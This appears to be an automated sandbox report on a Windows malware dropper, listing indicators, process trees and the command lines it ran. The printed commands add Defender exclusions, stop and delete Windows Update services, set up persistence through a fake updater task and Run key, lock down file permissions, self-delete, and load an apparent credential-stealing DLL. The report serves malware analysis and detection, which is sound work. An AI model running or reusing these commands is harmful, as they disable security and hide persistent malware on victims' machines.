HTTP User-Agent header	8	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	25	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Explorer.EXE

pid process

676 Explorer.EXE

pid	process
676	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

birge.exeChromeSetup.exeExplorer.EXEdownload.exe

pid	process
3028	birge.exe
3028	birge.exe
3028	birge.exe
3028	birge.exe
3028	birge.exe
3028	birge.exe
4152	ChromeSetup.exe
4152	ChromeSetup.exe
676	Explorer.EXE
676	Explorer.EXE
4216	download.exe
4216	download.exe
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE
676	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

676 Explorer.EXE
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

656
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

ChromeSetup.exe

pid process

4152 ChromeSetup.exe

pid	process
676	Explorer.EXE

pid	process
656

pid	process
4152	ChromeSetup.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXEpowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeShutdownPrivilege	676	Explorer.EXE
Token: SeCreatePagefilePrivilege	676	Explorer.EXE
Token: SeShutdownPrivilege	676	Explorer.EXE
Token: SeCreatePagefilePrivilege	676	Explorer.EXE
Token: SeShutdownPrivilege	676	Explorer.EXE
Token: SeCreatePagefilePrivilege	676	Explorer.EXE
Token: SeShutdownPrivilege	676	Explorer.EXE
Token: SeCreatePagefilePrivilege	676	Explorer.EXE
Token: SeShutdownPrivilege	676	Explorer.EXE
Token: SeCreatePagefilePrivilege	676	Explorer.EXE
Token: SeDebugPrivilege	3764	powershell.exe
Token: SeShutdownPrivilege	676	Explorer.EXE
Token: SeCreatePagefilePrivilege	676	Explorer.EXE
Token: SeDebugPrivilege	4776	powershell.exe
Token: SeShutdownPrivilege	2076	powercfg.exe
Token: SeCreatePagefilePrivilege	2076	powercfg.exe
Token: SeShutdownPrivilege	1780	powercfg.exe
Token: SeCreatePagefilePrivilege	1780	powercfg.exe
Token: SeShutdownPrivilege	2660	powercfg.exe
Token: SeCreatePagefilePrivilege	2660	powercfg.exe
Token: SeShutdownPrivilege	3172	powercfg.exe
Token: SeCreatePagefilePrivilege	3172	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4776	powershell.exe
Token: SeSecurityPrivilege	4776	powershell.exe
Token: SeTakeOwnershipPrivilege	4776	powershell.exe
Token: SeLoadDriverPrivilege	4776	powershell.exe
Token: SeSystemProfilePrivilege	4776	powershell.exe
Token: SeSystemtimePrivilege	4776	powershell.exe
Token: SeProfSingleProcessPrivilege	4776	powershell.exe
Token: SeIncBasePriorityPrivilege	4776	powershell.exe
Token: SeCreatePagefilePrivilege	4776	powershell.exe
Token: SeBackupPrivilege	4776	powershell.exe
Token: SeRestorePrivilege	4776	powershell.exe
Token: SeShutdownPrivilege	4776	powershell.exe
Token: SeDebugPrivilege	4776	powershell.exe
Token: SeSystemEnvironmentPrivilege	4776	powershell.exe
Token: SeRemoteShutdownPrivilege	4776	powershell.exe
Token: SeUndockPrivilege	4776	powershell.exe
Token: SeManageVolumePrivilege	4776	powershell.exe
Token: 33	4776	powershell.exe
Token: 34	4776	powershell.exe
Token: 35	4776	powershell.exe
Token: 36	4776	powershell.exe
Token: SeIncreaseQuotaPrivilege	4776	powershell.exe
Token: SeSecurityPrivilege	4776	powershell.exe
Token: SeTakeOwnershipPrivilege	4776	powershell.exe
Token: SeLoadDriverPrivilege	4776	powershell.exe
Token: SeSystemProfilePrivilege	4776	powershell.exe
Token: SeSystemtimePrivilege	4776	powershell.exe
Token: SeProfSingleProcessPrivilege	4776	powershell.exe
Token: SeIncBasePriorityPrivilege	4776	powershell.exe
Token: SeCreatePagefilePrivilege	4776	powershell.exe
Token: SeBackupPrivilege	4776	powershell.exe
Token: SeRestorePrivilege	4776	powershell.exe
Token: SeShutdownPrivilege	4776	powershell.exe
Token: SeDebugPrivilege	4776	powershell.exe
Token: SeSystemEnvironmentPrivilege	4776	powershell.exe
Token: SeRemoteShutdownPrivilege	4776	powershell.exe
Token: SeUndockPrivilege	4776	powershell.exe
Token: SeManageVolumePrivilege	4776	powershell.exe
Token: 33	4776	powershell.exe
Token: 34	4776	powershell.exe
Token: 35	4776	powershell.exe
Token: 36	4776	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

rundll32.exe

pid process

3892 rundll32.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Explorer.EXE

pid process

676 Explorer.EXE
676 Explorer.EXE

pid	process
3892	rundll32.exe

pid	process
676	Explorer.EXE
676	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exePlayer3.exenbveek.exeslwang.execmd.exerundll32.exerandom.exerundll32.exe

description	pid	process	target process
PID 4268 wrote to memory of 592	4268	2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe	Player3.exe
PID 4268 wrote to memory of 592	4268	2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe	Player3.exe
PID 4268 wrote to memory of 592	4268	2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe	Player3.exe
PID 4268 wrote to memory of 932	4268	2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe	pb1111.exe
PID 4268 wrote to memory of 932	4268	2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe	pb1111.exe
PID 4268 wrote to memory of 1260	4268	2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe	slwang.exe
PID 4268 wrote to memory of 1260	4268	2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe	slwang.exe
PID 4268 wrote to memory of 1260	4268	2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe	slwang.exe
PID 592 wrote to memory of 1412	592	Player3.exe	nbveek.exe
PID 592 wrote to memory of 1412	592	Player3.exe	nbveek.exe
PID 592 wrote to memory of 1412	592	Player3.exe	nbveek.exe
PID 4268 wrote to memory of 3028	4268	2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe	birge.exe
PID 4268 wrote to memory of 3028	4268	2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe	birge.exe
PID 4268 wrote to memory of 3028	4268	2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe	birge.exe
PID 1412 wrote to memory of 204	1412	nbveek.exe	schtasks.exe
PID 1412 wrote to memory of 204	1412	nbveek.exe	schtasks.exe
PID 1412 wrote to memory of 204	1412	nbveek.exe	schtasks.exe
PID 1412 wrote to memory of 2996	1412	nbveek.exe	cmd.exe
PID 1412 wrote to memory of 2996	1412	nbveek.exe	cmd.exe
PID 1412 wrote to memory of 2996	1412	nbveek.exe	cmd.exe
PID 1260 wrote to memory of 1876	1260	slwang.exe	slwang.exe
PID 1260 wrote to memory of 1876	1260	slwang.exe	slwang.exe
PID 1260 wrote to memory of 1876	1260	slwang.exe	slwang.exe
PID 2996 wrote to memory of 3760	2996	cmd.exe	cmd.exe
PID 2996 wrote to memory of 3760	2996	cmd.exe	cmd.exe
PID 2996 wrote to memory of 3760	2996	cmd.exe	cmd.exe
PID 2996 wrote to memory of 3512	2996	cmd.exe	cacls.exe
PID 2996 wrote to memory of 3512	2996	cmd.exe	cacls.exe
PID 2996 wrote to memory of 3512	2996	cmd.exe	cacls.exe
PID 2996 wrote to memory of 1020	2996	cmd.exe	cacls.exe
PID 2996 wrote to memory of 1020	2996	cmd.exe	cacls.exe
PID 2996 wrote to memory of 1020	2996	cmd.exe	cacls.exe
PID 2996 wrote to memory of 4832	2996	cmd.exe	cmd.exe
PID 2996 wrote to memory of 4832	2996	cmd.exe	cmd.exe
PID 2996 wrote to memory of 4832	2996	cmd.exe	cmd.exe
PID 2996 wrote to memory of 2740	2996	cmd.exe	cacls.exe
PID 2996 wrote to memory of 2740	2996	cmd.exe	cacls.exe
PID 2996 wrote to memory of 2740	2996	cmd.exe	cacls.exe
PID 2996 wrote to memory of 2296	2996	cmd.exe	cacls.exe
PID 2996 wrote to memory of 2296	2996	cmd.exe	cacls.exe
PID 2996 wrote to memory of 2296	2996	cmd.exe	cacls.exe
PID 1412 wrote to memory of 4048	1412	nbveek.exe	pb1111.exe
PID 1412 wrote to memory of 4048	1412	nbveek.exe	pb1111.exe
PID 4420 wrote to memory of 4156	4420	rundll32.exe	rundll32.exe
PID 4420 wrote to memory of 4156	4420	rundll32.exe	rundll32.exe
PID 4420 wrote to memory of 4156	4420	rundll32.exe	rundll32.exe
PID 1412 wrote to memory of 3968	1412	nbveek.exe	random.exe
PID 1412 wrote to memory of 3968	1412	nbveek.exe	random.exe
PID 1412 wrote to memory of 3968	1412	nbveek.exe	random.exe
PID 3968 wrote to memory of 4608	3968	random.exe	random.exe
PID 3968 wrote to memory of 4608	3968	random.exe	random.exe
PID 3968 wrote to memory of 4608	3968	random.exe	random.exe
PID 1412 wrote to memory of 3436	1412	nbveek.exe	XandETC.exe
PID 1412 wrote to memory of 3436	1412	nbveek.exe	XandETC.exe
PID 4520 wrote to memory of 2900	4520	rundll32.exe	rundll32.exe
PID 4520 wrote to memory of 2900	4520	rundll32.exe	rundll32.exe
PID 4520 wrote to memory of 2900	4520	rundll32.exe	rundll32.exe
PID 1412 wrote to memory of 4152	1412	nbveek.exe	ChromeSetup.exe
PID 1412 wrote to memory of 4152	1412	nbveek.exe	ChromeSetup.exe
PID 1412 wrote to memory of 4152	1412	nbveek.exe	ChromeSetup.exe
PID 1412 wrote to memory of 4216	1412	nbveek.exe	download.exe
PID 1412 wrote to memory of 4216	1412	nbveek.exe	download.exe
PID 1412 wrote to memory of 4216	1412	nbveek.exe	download.exe
PID 1412 wrote to memory of 64	1412	nbveek.exe	download.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:676

C:\Users\Admin\AppData\Local\Temp\2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe
"C:\Users\Admin\AppData\Local\Temp\2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4268

C:\Users\Admin\AppData\Local\Temp\Player3.exe
"C:\Users\Admin\AppData\Local\Temp\Player3.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:592

C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1412

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
5⤵
- Creates scheduled task(s)
PID:204

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit
5⤵
- Suspicious use of WriteProcessMemory
PID:2996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:3760

C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:N"
6⤵
PID:3512

C:\Windows\SysWOW64\cacls.exe
CACLS "..\16de06bfb4" /P "Admin:R" /E
6⤵
PID:2296

C:\Windows\SysWOW64\cacls.exe
CACLS "..\16de06bfb4" /P "Admin:N"
6⤵
PID:2740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:4832

C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:R" /E
6⤵
PID:1020

C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe
"C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe"
5⤵
- Executes dropped EXE
PID:4048

C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe
"C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3968

C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe
"C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe" -h
6⤵
- Executes dropped EXE
PID:4608

C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
PID:3436

C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe
"C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe"
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4152

C:\Users\Admin\AppData\Local\Temp\1000097001\download.exe
"C:\Users\Admin\AppData\Local\Temp\1000097001\download.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4216

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1000097001\download.exe" & exit
6⤵
PID:4032

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
7⤵
- Delays execution with timeout.exe
PID:2208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 2004
6⤵
- Program crash
PID:2876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 1876
6⤵
- Program crash
PID:4832

C:\Users\Admin\AppData\Local\Temp\1000098001\download.exe
"C:\Users\Admin\AppData\Local\Temp\1000098001\download.exe"
5⤵
- Executes dropped EXE
- Modifies registry class
PID:64

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
5⤵
- Loads dropped DLL
PID:960

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
6⤵
- Loads dropped DLL
PID:3784

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3784 -s 688
7⤵
- Program crash
PID:2604

C:\Users\Admin\AppData\Local\Temp\pb1111.exe
"C:\Users\Admin\AppData\Local\Temp\pb1111.exe"
3⤵
- Executes dropped EXE
PID:932

C:\Users\Admin\AppData\Local\Temp\slwang.exe
"C:\Users\Admin\AppData\Local\Temp\slwang.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1260

C:\Users\Admin\AppData\Local\Temp\slwang.exe
"C:\Users\Admin\AppData\Local\Temp\slwang.exe" -h
4⤵
- Executes dropped EXE
PID:1876

C:\Users\Admin\AppData\Local\Temp\birge.exe
"C:\Users\Admin\AppData\Local\Temp\birge.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3028

C:\Users\Admin\AppData\Local\Temp\36A0.exe
C:\Users\Admin\AppData\Local\Temp\36A0.exe
2⤵
- Executes dropped EXE
PID:520

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Eorppuwwrieiyod.dll,start
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Checks processor information in registry
PID:2384

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 23751
4⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 520 -s 400
3⤵
- Program crash
PID:4996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3764

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:1280

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4356

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:4028

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1388

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4668

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:600

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:780

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:3504

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:3948

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:3924

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:4712

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:4392

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2076

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2660

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
2⤵
PID:324

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
3⤵
PID:4036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3148

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:3256

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:2836

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:3828

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:756

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:3780

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4008

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4748

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:2320

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:4420

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1396

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:3900

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:4124

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:4356

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:2144

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:3352

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:2660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3944

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe zuhwtyqtfkk
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4804

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:4984

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
PID:2736

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:2256

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=
2⤵
- Modifies data under HKEY_USERS
PID:4208

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4420

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
- Loads dropped DLL
PID:4156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4156 -s 600
3⤵
- Program crash
PID:1280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4156 -ip 4156
1⤵
PID:2080

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4520

